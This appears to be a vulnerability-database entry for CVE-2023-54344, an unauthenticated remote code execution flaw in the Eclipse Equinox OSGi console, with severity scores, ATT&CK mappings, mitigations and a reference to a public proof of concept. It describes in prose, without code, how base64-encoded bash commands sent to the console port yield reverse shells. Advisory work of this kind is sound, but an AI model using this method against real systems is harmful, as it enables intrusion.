CVE-2023-54344
Published: 05 May 2026
Summary
CVE-2023-54344 is a critical-severity Missing Authentication for Critical Function (CWE-306) vulnerability. Its CVSS base score is 9.8 (Critical).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked at the 41.7th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 CM-7 (Least Functionality) and SC-7 (Boundary Protection).
Threat & Defense at a Glance
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)AI
Requires timely remediation of the specific flaw in Eclipse Equinox OSGi 3.7.2 and earlier, eliminating the unauthenticated remote code execution vulnerability in the console interface.
Restricts system functionality by prohibiting or disabling the unnecessary OSGi console port, preventing exposure to unauthenticated remote command execution.
Enforces boundary protection to monitor and control network communications, blocking unauthorized access to the exposed OSGi console port.
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
Direct unauthenticated RCE on exposed OSGi console enables public-facing app exploitation (T1190) and arbitrary Unix shell command execution including reverse shells (T1059.004).
NVD Description
Eclipse Equinox OSGi 3.7.2 and earlier contains a remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary commands by sending payloads to the console interface. Attackers can connect to the OSGi console port and send base64-encoded bash commands…
more
wrapped in fork directives to achieve code execution and establish reverse shell connections.
Deeper analysisAI
Eclipse Equinox OSGi versions 3.7.2 and earlier contain a remote code execution vulnerability in the console interface. This flaw, tracked as CVE-2023-54344 and published on 2026-05-05, allows attackers to execute arbitrary commands by sending specially crafted payloads. It is associated with CWE-306 (Missing Authentication for Critical Function) and carries a CVSS v3.1 base score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), indicating critical severity due to its network accessibility and lack of prerequisites.
Unauthenticated attackers can exploit this vulnerability by connecting to the exposed OSGi console port and transmitting base64-encoded bash commands wrapped in fork directives. Successful exploitation enables arbitrary code execution on the target system, including the establishment of reverse shell connections for persistent access and further compromise.
Advisories and related resources, including a Vulncheck advisory on the Eclipse Equinox OSGi remote code execution and an Exploit-DB entry (exploit 51879), provide details on the issue, with the latter publishing a proof-of-concept exploit. No specific patch or mitigation details are outlined in the core CVE information.
Details
- CWE(s)